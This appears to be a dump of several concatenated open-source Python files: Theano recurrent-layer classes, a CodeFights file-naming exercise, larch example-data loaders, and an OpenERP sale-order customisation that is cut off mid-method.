self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
#init_state=ctx
h, _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h, ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class GRU3(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
self.W_hc=glorot_uniform((n_hidden,n_hidden))
self.W_hl=glorot_uniform((n_hidden,n_hidden))
self.W_cl=glorot_uniform((n_hidden,n_hidden))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c, self.W_hc,
self.W_hl,self.W_cl
]
self.L1 = 0
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)
def _step(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,l_tm1,
u_z, u_r, u_h, ctx):
c=ctx+T.dot(h_tm1,self.W_hc)
c=tanh(c)
c=T.exp(c)
c=c/c.sum(-1, keepdims=True)
c=ctx*c
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+c)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+c)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+c)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1+c
logit=tanh(T.dot(h_t, self.W_hl)+T.dot(c, self.W_cl))
return h_t,logit
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self, train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
ctx=dropout_layer(self.input2,0.25)
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(ctx, self.W_c) + self.b_c
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
[h,logit], _ = theano.scan(
self._step,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=[init_state,init_state],
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return logit[-1]
return logit.dimshuffle((1, 0, 2))
class LSTM2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',return_seq=True):
self.n_in=int(n_in)
self.n_hidden=int(n_hidden)
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
self.W_i = glorot_uniform((n_in,n_hidden))
self.U_i = orthogonal((n_hidden,n_hidden))
self.b_i = zero((n_hidden,))
self.W_f = glorot_uniform((n_in,n_hidden))
self.U_f = orthogonal((n_hidden,n_hidden))
self.b_f = one((n_hidden,))
self.W_c = glorot_uniform((n_in,n_hidden))
self.U_c = orthogonal((n_hidden,n_hidden))
self.b_c = zero((n_hidden,))
self.W_o = glorot_uniform((n_in,n_hidden))
self.U_o = orthogonal((n_hidden,n_hidden))
self.b_o = zero((n_hidden,))
self.params = [
self.W_i, self.U_i, self.b_i,
self.W_c, self.U_c, self.b_c,
self.W_f, self.U_f, self.b_f,
self.W_o, self.U_o, self.b_o,
]
self.L1 = 0
self.L2_sqr = 0
def _step(self,
xi_t, xf_t, xo_t, xc_t, mask_tm1,
h_tm1, c_tm1,
u_i, u_f, u_o, u_c):
i_t = hard_sigmoid(xi_t + T.dot(h_tm1, u_i))
f_t = hard_sigmoid(xf_t + T.dot(h_tm1, u_f))
c_t = f_t * c_tm1 + i_t * self.activation(xc_t + T.dot(h_tm1, u_c))
c_t = mask_tm1 * c_t + (1. - mask_tm1) * c_tm1
o_t = hard_sigmoid(xo_t + T.dot(h_tm1, u_o))
h_t = o_t * self.activation(c_t)
h_t = mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t, c_t
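        # Annotation: standard LSTM cell equations with masking,
        #   i_t = hard_sigmoid(W_i x_t + b_i + U_i h_{t-1}),  f_t = hard_sigmoid(W_f x_t + b_f + U_f h_{t-1})
        #   c_t = f_t * c_{t-1} + i_t * activation(W_c x_t + b_c + U_c h_{t-1})
        #   o_t = hard_sigmoid(W_o x_t + b_o + U_o h_{t-1}),  h_t = o_t * activation(c_t)
        # and the mask freezes both h and c on padded timesteps.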
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
xi = T.dot(X, self.W_i) + self.b_i
xf = T.dot(X, self.W_f) + self.b_f
xc = T.dot(X, self.W_c) + self.b_c
xo = T.dot(X, self.W_o) + self.b_o
init_state=self.input2
[h, c], _ = theano.scan(self._step,
sequences=[xi, xf, xo, xc, padded_mask],
outputs_info=[
init_state,
T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
],
non_sequences=[self.U_i, self.U_f, self.U_o, self.U_c])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
class BiDirectionGRU2(Recurrent):
def __init__(self,n_in,n_hidden,activation='tanh',output_mode='concat',return_seq=True):
self.n_in=int(n_in)
if output_mode is 'concat':n_hidden=int(n_hidden/2)
self.n_hidden=int(n_hidden)
self.output_mode = output_mode
self.input= T.tensor3()
self.input2=T.matrix()
self.x_mask=T.matrix()
self.activation=eval(activation)
self.return_seq=return_seq
# forward weights
self.W_z = glorot_uniform((n_in,n_hidden))
self.U_z = glorot_uniform((n_hidden,n_hidden))
self.b_z = zero((n_hidden,))
self.W_r = glorot_uniform((n_in,n_hidden))
self.U_r = glorot_uniform((n_hidden,n_hidden))
self.b_r = zero((n_hidden,))
self.W_h = glorot_uniform((n_in,n_hidden))
self.U_h = glorot_uniform((n_hidden,n_hidden))
self.b_h = zero((n_hidden,))
self.W_c = glorot_uniform((4096,n_hidden))
self.b_c = zero((n_hidden,))
# backward weights
self.Wb_z = glorot_uniform((n_in,n_hidden))
self.Ub_z = glorot_uniform((n_hidden,n_hidden))
self.bb_z = zero((n_hidden,))
self.Wb_r = glorot_uniform((n_in,n_hidden))
self.Ub_r = glorot_uniform((n_hidden,n_hidden))
self.bb_r = zero((n_hidden,))
self.Wb_h = glorot_uniform((n_in,n_hidden))
self.Ub_h = glorot_uniform((n_hidden,n_hidden))
self.bb_h = zero((n_hidden,))
self.Wb_c = glorot_uniform((4096,n_hidden))
self.bb_c = zero((n_hidden,))
self.params = [
self.W_z, self.U_z, self.b_z,
self.W_r, self.U_r, self.b_r,
self.W_h, self.U_h, self.b_h,
self.W_c, self.b_c,
self.Wb_z, self.Ub_z, self.bb_z,
self.Wb_r, self.Ub_r, self.bb_r,
self.Wb_h, self.Ub_h, self.bb_h,
self.Wb_c, self.bb_c
]
self.L1 = T.sum(abs(self.W_z))+T.sum(abs(self.U_z))+\
T.sum(abs(self.W_r))+T.sum(abs(self.U_r))+\
T.sum(abs(self.W_h))+T.sum(abs(self.U_h))+\
T.sum(abs(self.Wb_z))+T.sum(abs(self.Ub_z))+\
T.sum(abs(self.Wb_r))+T.sum(abs(self.Ub_r))+\
T.sum(abs(self.Wb_h))+T.sum(abs(self.Ub_h))
self.L2_sqr = T.sum(self.W_z**2) + T.sum(self.U_z**2)+\
T.sum(self.W_r**2) + T.sum(self.U_r**2)+\
T.sum(self.W_h**2) + T.sum(self.U_h**2)+\
T.sum(self.Wb_z**2) + T.sum(self.Ub_z**2)+\
T.sum(self.Wb_r**2) + T.sum(self.Ub_r**2)+\
T.sum(self.Wb_h**2) + T.sum(self.Ub_h**2)
def _fstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def _bstep(self,
xz_t, xr_t, xh_t, mask_tm1,
h_tm1,
u_z, u_r, u_h,
ctx):
ctx=dropout_layer(ctx)
z = hard_sigmoid(xz_t + T.dot(h_tm1, u_z)+ctx)
r = hard_sigmoid(xr_t + T.dot(h_tm1, u_r)+ctx)
hh_t = self.activation(xh_t + T.dot(r * h_tm1, u_h)+ctx)
h_t = z * h_tm1 + (1 - z) * hh_t
h_t=mask_tm1 * h_t + (1. - mask_tm1) * h_tm1
return h_t
def get_forward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.W_z) + self.b_z
x_r = T.dot(X, self.W_r) + self.b_r
x_h = T.dot(X, self.W_h) + self.b_h
ctx = T.dot(self.input2, self.W_c) + self.b_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._fstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.U_z, self.U_r, self.U_h,ctx])
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def get_backward_output(self,train=False):
X = self.get_input(train)
padded_mask = self.get_mask()[:,:, None].astype('int8')
X = X.dimshuffle((1, 0, 2))
padded_mask = padded_mask.dimshuffle((1, 0, 2))
x_z = T.dot(X, self.Wb_z) + self.bb_z
x_r = T.dot(X, self.Wb_r) + self.bb_r
x_h = T.dot(X, self.Wb_h) + self.bb_h
ctx = T.dot(self.input2, self.Wb_c) + self.bb_c
#init_state=self.input2
init_state=T.unbroadcast(alloc_zeros_matrix(X.shape[1], self.n_hidden), 1)
h, c = theano.scan(
self._bstep,
sequences=[x_z, x_r, x_h, padded_mask],
outputs_info=init_state,
non_sequences=[self.Ub_z, self.Ub_r, self.Ub_h, ctx],go_backwards = True)
if self.return_seq is False: return h[-1]
return h.dimshuffle((1, 0, 2))
def add_input(self, add_input=None):
self.input2=add_input
def get_output(self,train=False):
forward = self.get_forward_output(train)
backward = self.get_backward_output(train)
if self.output_mode is 'sum':
return forward + backward
elif self.output_mode is 'concat':
if self.return_seq: axis=2
else: axis=1
return T.concatenate([forward, backward], axis=axis)
else:
raise Exception('output mode is not sum or concat') | gpl-3.0 | 7,263,858,907,643,852,000 | 33.645113 | 168 | 0.489496 | false |
HKuz/Test_Code | CodeFights/fileNaming.py | 1 | 1488 | #!/usr/local/bin/python
# Code Fights File Naming Problem
def fileNaming(names):
valid = []
tmp = dict()
for name in names:
if name not in tmp:
valid.append(name)
tmp[name] = True
else:
# That file name has been used
k = 1
new = name
while new in tmp:
new = name + '(' + str(k) + ')'
k += 1
valid.append(new)
tmp[new] = True
return valid
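# Annotation: on a name collision the loop appends "(k)" for the smallest k whose result is itself
# unused, e.g. ["doc", "doc", "doc(1)"] -> ["doc", "doc(1)", "doc(1)(1)"].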
def main():
tests = [
[
["doc", "doc", "image", "doc(1)", "doc"],
["doc", "doc(1)", "image", "doc(1)(1)", "doc(2)"]
],
[
["a(1)", "a(6)", "a", "a", "a", "a", "a", "a", "a", "a", "a", "a"],
["a(1)", "a(6)", "a", "a(2)", "a(3)", "a(4)", "a(5)", "a(7)",
"a(8)", "a(9)", "a(10)", "a(11)"]
],
[
["dd", "dd(1)", "dd(2)", "dd", "dd(1)", "dd(1)(2)", "dd(1)(1)",
"dd", "dd(1)"],
["dd", "dd(1)", "dd(2)", "dd(3)", "dd(1)(1)", "dd(1)(2)",
"dd(1)(1)(1)", "dd(4)", "dd(1)(3)"]
]
]
for t in tests:
res = fileNaming(t[0])
ans = t[1]
if ans == res:
print("PASSED: fileNaming({}) returned {}"
.format(t[0], res))
else:
print("FAILED: fileNaming({}) returned {}, answer: {}"
.format(t[0], res, ans))
if __name__ == '__main__':
main()
| mit | -816,034,966,986,424,000 | 26.054545 | 79 | 0.348118 | false |
jpn--/larch | larch/data_services/examples.py | 1 | 3855 | import os
import tables as tb
import pandas as pd
def MTC():
from larch.dataframes import DataFrames
from larch.data_warehouse import example_file
ca = pd.read_csv(example_file('MTCwork.csv.gz'), index_col=('casenum', 'altnum'))
ca['altnum'] = ca.index.get_level_values('altnum')
dt = DataFrames(
ca,
ch="chose",
crack=True,
alt_codes=[1, 2, 3, 4, 5, 6],
alt_names=['DA', 'SR2', 'SR3', 'TRANSIT', 'BIKE', 'WALK']
)
dt.data_ce_as_ca("_avail_")
return dt
# from .service import DataService
# from .h5 import H5PodCA, H5PodCO
# warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'MTCwork.h5d')
# f = tb.open_file(warehouse_file, mode='r')
# idca = H5PodCA(f.root.larch.idca)
# idco = H5PodCO(f.root.larch.idco)
# return DataService(pods=[idca,idco], altids=[1,2,3,4,5,6], altnames=['DA','SR2','SR3','TRANSIT','BIKE','WALK'])
def EXAMPVILLE(model=None):
from ..util import Dict
evil = Dict()
from .service import DataService
import numpy
from .h5 import H5PodCA, H5PodCO, H5PodRC, H5PodCS
from ..omx import OMX
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
evil.skims = OMX(os.path.join(warehouse_dir,'exampville.omx'), mode='r')
evil.tours = H5PodCO(os.path.join(warehouse_dir,'exampville_tours.h5'), mode='r', ident='tours')
# hhs = H5PodCO(os.path.join(warehouse_dir,'exampville_hh.h5'))
# persons = H5PodCO(os.path.join(warehouse_dir,'exampville_person.h5'))
# tours.merge_external_data(hhs, 'HHID', )
# tours.merge_external_data(persons, 'PERSONID', )
# tours.add_expression("HOMETAZi", "HOMETAZ-1", dtype=int)
# tours.add_expression("DTAZi", "DTAZ-1", dtype=int)
evil.skims_rc = H5PodRC(evil.tours.HOMETAZi[:], evil.tours.DTAZi[:], groupnode=evil.skims.data, ident='skims_rc')
evil.tours_stack = H5PodCS([evil.tours, evil.skims_rc], storage=evil.tours, ident='tours_stack_by_mode').set_alts([1,2,3,4,5])
DA = 1
SR = 2
Walk = 3
Bike = 4
Transit = 5
# tours_stack.set_bunch('choices', {
# DA: 'TOURMODE==1',
# SR: 'TOURMODE==2',
# Walk: 'TOURMODE==3',
# Bike: 'TOURMODE==4',
# Transit: 'TOURMODE==5',
# })
#
# tours_stack.set_bunch('availability', {
# DA: '(AGE>=16)',
# SR: '1',
# Walk: 'DIST<=3',
# Bike: 'DIST<=15',
# Transit: 'RAIL_TIME>0',
# })
evil.mode_ids = [DA, SR, Walk, Bike, Transit]
evil.mode_names = ['DA', 'SR', 'Walk', 'Bike', 'Transit']
nZones = 15
evil.dest_ids = numpy.arange(1,nZones+1)
evil.logsums = H5PodCA(os.path.join(warehouse_dir,'exampville_mc_logsums.h5'), mode='r', ident='logsums')
return evil
def SWISSMETRO():
from ..util.temporaryfile import TemporaryGzipInflation
warehouse_dir = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', )
from .service import DataService
from .h5 import H5PodCO, H5PodCS
warehouse_file = TemporaryGzipInflation(os.path.join(warehouse_dir, "swissmetro.h5.gz"))
f = tb.open_file(warehouse_file, mode='r')
idco = H5PodCO(f.root.larch.idco)
stack = H5PodCS(
[idco], ident='stack_by_mode', alts=[1,2,3],
traveltime={1: "TRAIN_TT", 2: "SM_TT", 3: "CAR_TT"},
cost={1: "TRAIN_CO*(GA==0)", 2: "SM_CO*(GA==0)", 3: "CAR_CO"},
avail={1:'TRAIN_AV*(SP!=0)', 2:'SM_AV', 3:'CAR_AV*(SP!=0)'},
choice={1: "CHOICE==1", 2: "CHOICE==2", 3: "CHOICE==3"},
)
return DataService(pods=[idco, stack], altids=[1,2,3], altnames=['Train', 'SM', 'Car'])
def ITINERARY_RAW():
warehouse_file = os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', 'itinerary_data.csv.gz')
import pandas
return pandas.read_csv(warehouse_file)
def example_file(filename):
warehouse_file = os.path.normpath( os.path.join( os.path.dirname(__file__), '..', 'data_warehouse', filename) )
if os.path.exists(warehouse_file):
return warehouse_file
raise FileNotFoundError(f"there is no example data file '{warehouse_file}' in data_warehouse")
| gpl-3.0 | 2,696,184,256,727,657,500 | 37.168317 | 127 | 0.659663 | false |
trabacus-softapps/docker-magicecommerce | additional_addons/magicemart/m8_sale.py | 1 | 45772 | # -*- coding: utf-8 -*-
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from datetime import datetime, timedelta
import time
from openerp.tools.translate import _
import openerp.addons.decimal_precision as dp
import amount_to_text_softapps
from lxml import etree
from openerp.osv.orm import setup_modifiers
from openerp.tools import DEFAULT_SERVER_DATE_FORMAT, DEFAULT_SERVER_DATETIME_FORMAT
class sale_order(osv.osv):
_inherit = 'sale.order'
    # The many2one "open record" arrow should not be shown to Customer Portal users and managers
def fields_view_get(self, cr, uid, view_id=None, view_type='form', context=None, toolbar=False, submenu=False):
user = self.pool.get('res.users').browse(cr,uid,uid)
if context is None:
context = {}
res = super(sale_order, self).fields_view_get(cr, uid, view_id=view_id, view_type=view_type, context=context, toolbar=toolbar,submenu=False)
doc = etree.XML(res['arch'])
cr.execute("""select uid from res_groups_users_rel where gid in
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name in ('User','Manager')) and uid = """+str(uid))
portal_user = cr.fetchone()
if portal_user:
if ('fields' in res) and (res['fields'].get('order_line'))\
and (res['fields']['order_line'].get('views'))\
and (res['fields']['order_line']['views'].get('tree'))\
and (res['fields']['order_line']['views']['tree'].get('arch')):
# doc = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
# print 'doc',res['fields']['order_line']['views']['tree']['arch']
doc1 = etree.XML(res['fields']['order_line']['views']['tree']['arch'])
for node in doc1.xpath("//field[@name='price_unit']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
for node in doc1.xpath("//field[@name='tax_id']"):
node.set('readonly', '1')
setup_modifiers(node, res['fields']['order_line'])
res['fields']['order_line']['views']['tree']['arch'] = etree.tostring(doc1)
#
# if portal_user:
if view_type == 'form':
domain = "[('id','child_of',"+str(user.partner_id.id)+")]"
for node in doc.xpath("//field[@name='pricelist_id']"):
node.set('options', '{"no_open":True}')
node.set('readonly','1')
setup_modifiers(node,res['fields']['pricelist_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_id']"):
node.set('options', "{'no_open' : true}")
node.set('options', "{'no_create' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='contact_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['contact_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_invoice_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_invoice_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='partner_shipping_id']"):
node.set('options', "{'no_open' : true}")
node.set('domain', domain )
setup_modifiers(node, res['fields']['partner_shipping_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='warehouse_id']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['warehouse_id'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='payment_term']"):
node.set('options', "{'no_open' : true}")
setup_modifiers(node, res['fields']['payment_term'])
res['arch'] = etree.tostring(doc)
for node in doc.xpath("//field[@name='date_order']"):
node.set('readonly', "1")
setup_modifiers(node, res['fields']['date_order'])
res['arch'] = etree.tostring(doc)
return res
def _get_default_warehouse(self, cr, uid, context=None):
if not context:
context = {}
company_id = self.pool.get('res.users')._get_company(cr, context.get('uid',uid), context=context)
warehouse_ids = self.pool.get('stock.warehouse').search(cr, uid, [('company_id', '=', company_id)], context=context)
if not warehouse_ids:
return False
return warehouse_ids[0]
def default_get(self, cr, uid, fields, context=None):
res = super(sale_order,self).default_get(cr, uid, fields, context)
user = self.pool.get('res.users').browse(cr, uid, uid)
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
res['partner_id'] = user.partner_id.id
res.update({'order_policy': 'picking'})
return res
def _get_portal(self, cr, uid, ids, fields, args, context=None):
res = {}
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
for case in self.browse(cr, uid, ids):
res[case.id] = {'lock_it': False}
lock_flag = False
if case.state not in ('sent', 'draft'):
lock_flag = True
if uid == portal_group:
if case.state in ('sent', 'draft') and case.sent_portal:
lock_flag = True
res[case.id]= lock_flag
return res
def _get_order(self, cr, uid, ids, context=None):
result = {}
for line in self.pool.get('sale.order.line').browse(cr, uid, ids, context=context):
result[line.order_id.id] = True
return result.keys()
# Overriden Discount is not considering in tax(Removing Discount in this function)
def _amount_line_tax(self, cr, uid, line, context=None):
val = 0.0
for c in self.pool.get('account.tax').compute_all(cr, uid, line.tax_id, line.price_unit, line.product_uom_qty, line.product_id, line.order_id.partner_id)['taxes']:
val += c.get('amount', 0.0)
return val
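    # Annotation: unlike the stock implementation, the unit price above is passed to compute_all
    # without the (1 - discount/100) factor, so taxes are computed on the undiscounted amount.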
def _amount_all(self, cr, uid, ids, field_name, arg, context=None):
cur_obj = self.pool.get('res.currency')
res = {}
for order in self.browse(cr, uid, ids, context=context):
res[order.id] = {
'amount_untaxed': 0.0,
'amount_tax': 0.0,
'amount_total': 0.0,
}
val = val1 = 0.0
cur = order.pricelist_id.currency_id
for line in order.order_line:
val1 += line.price_subtotal
val += self._amount_line_tax(cr, uid, line, context=context)
res[order.id]['amount_tax'] = cur_obj.round(cr, uid, cur, val)
res[order.id]['amount_untaxed'] = cur_obj.round(cr, uid, cur, val1)
res[order.id]['amount_total'] = round(res[order.id]['amount_untaxed'] + res[order.id]['amount_tax'])
return res
    # Function to convert the total amount into words
def _amt_in_words(self, cr, uid, ids, field_name, args, context=None):
res={}
for case in self.browse(cr, uid, ids):
txt=''
if case.amount_total:
txt += amount_to_text_softapps._100000000_to_text(int(round(case.amount_total)))
res[case.id] = txt
return res
_columns ={
'order_policy': fields.selection([
('manual', 'On Demand'),
('picking', 'On Delivery Order'),
('prepaid', 'Before Delivery'),
], 'Create Invoice', required=True, readonly=True, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]},
help="""On demand: A draft invoice can be created from the sales order when needed. \nOn delivery order: A draft invoice can be created from the delivery order when the products have been delivered. \nBefore delivery: A draft invoice is created from the sales order and must be paid before the products can be delivered."""),
'contact_id' : fields.many2one('res.partner','Contact Person'),
#inherited
'amount_untaxed': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Untaxed Amount',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The amount without tax.", track_visibility='always'),
'amount_tax': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Taxes',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The tax amount."),
'amount_total': fields.function(_amount_all, digits_compute=dp.get_precision('Account'), string='Total',
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
multi='sums', help="The total amount."),
'amt_in_words' : fields.function(_amt_in_words, method=True, string="Amount in Words", type="text",
store={
'sale.order': (lambda self, cr, uid, ids, c={}: ids, ['order_line'], 10),
'sale.order.line': (_get_order, ['price_unit', 'tax_id', 'discount', 'product_uom_qty','order_id'], 20),
},
help="Amount in Words.", track_visibility='always'),
'date_from' : fields.function(lambda *a,**k:{}, method=True, type='date',string="From"),
'date_to' : fields.function(lambda *a,**k:{}, method=True, type='date',string="To"),
'terms' : fields.text("Terms And Condition"),
'lock_it' : fields.function(_get_portal, type='boolean', string='Lock it'),
'sent_portal' : fields.boolean('Qtn Sent by Portal'),
'warehouse_id': fields.many2one('stock.warehouse', 'Warehouse', required=True),
# Overriden for old Records
# 'name': fields.char('Order Reference', required=True, copy=False,
# readonly=False, states={'draft': [('readonly', False)], 'sent': [('readonly', False)]}, select=True),
#
# 'do_name' : fields.char("Delivery Order No", size=25),
}
_defaults = {
'order_policy': 'picking',
'sent_portal': False,
'warehouse_id':_get_default_warehouse
}
    # Duplicates the sale order and opens the copied order in the form view.
def reorder(self, cr, uid, ids, context=None):
context = context or {}
print "YES"
res = self.copy(cr, uid, ids[0], {}, context)
view_ref = self.pool.get('ir.model.data').get_object_reference(cr, uid, 'sale', 'view_order_form')
view_id = view_ref and view_ref[1] or False,
return {
'type': 'ir.actions.act_window',
'name': _('Sales Order'),
'res_model': 'sale.order',
'res_id': res,
'view_type': 'form',
'view_mode': 'form',
'view_id': view_id,
'target': 'current',
'nodestroy': True,
}
def _prepare_invoice(self, cr, uid, order, lines, context=None):
stock_obj = self.pool.get("stock.picking.out")
invoice_vals = super(sale_order,self)._prepare_invoice(cr, uid, order, lines, context)
pick_ids = stock_obj.search(cr, uid,[('sale_id','=',order.id)])
for pick in stock_obj.browse(cr, uid, pick_ids):
invoice_vals.update({
'transport' : pick.cust_po_ref or '',
'vehicle' : pick.vehicle or '',
'dc_ref' : pick.name or '',
})
return invoice_vals
    # On selecting a customer, populate the default contact person and pricelist
def onchange_partner_id(self, cr, uid, ids, part, context=None):
if not context:
context = {}
partner_obj = self.pool.get("res.partner")
partner_vals = super(sale_order,self).onchange_partner_id(cr, uid, ids, part, context=context)
if part:
partner = partner_obj.browse(cr, uid, part)
cont = partner_obj.search(cr, uid, [('parent_id','=',part)], limit=1)
partner_vals['value'].update({
'contact_id' : cont and cont[0] or False,
'pricelist_id': partner.property_product_pricelist.id
})
return partner_vals
def _prepare_order_picking(self, cr, uid, order, context=None):
res = super(sale_order,self)._prepare_order_picking(cr, uid, order, context)
res.update({
'contact_id' : order.contact_id and order.contact_id.id or False
})
return res
def quotation(self, cr, uid, ids, context=None):
case = self.browse(cr, uid, ids[0])
datas = {
'model': 'sale.order',
'ids': ids,
'form': self.read(cr, uid, ids[0], context=context),
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'Sales Quotation',
'name' : case.name and 'Sales Quotation - ' + case.name or 'Sales Quotation',
'datas': datas,
'nodestroy': True
}
def action_quotation_send(self, cr, uid, ids, context=None):
'''
This function opens a window to compose an email, with the edi sale template message loaded by default
'''
assert len(ids) == 1, 'This option should only be used for a single id at a time.'
ir_model_data = self.pool.get('ir.model.data')
cr.execute("""select uid from res_groups_users_rel where gid=
(select id from res_groups where category_id in
( select id from ir_module_category where name = 'Customer Portal' ) and name = 'Manager') and uid = """+str(uid))
portal_user = cr.fetchone()
portal_group = portal_user and portal_user[0]
if uid == portal_group:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'magicemart', 'email_template_send_quotation')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
'default_composition_mode': 'comment',
'mark_so_as_sent': True
})
else:
try:
template_id = ir_model_data.get_object_reference(cr, uid, 'sale', 'email_template_edi_sale')[1]
except ValueError:
template_id = False
try:
compose_form_id = ir_model_data.get_object_reference(cr, uid, 'mail', 'email_compose_message_wizard_form')[1]
except ValueError:
compose_form_id = False
ctx = dict(context)
ctx.update({
'default_model': 'sale.order',
'default_res_id': ids[0],
'default_use_template': bool(template_id),
'default_template_id': template_id,
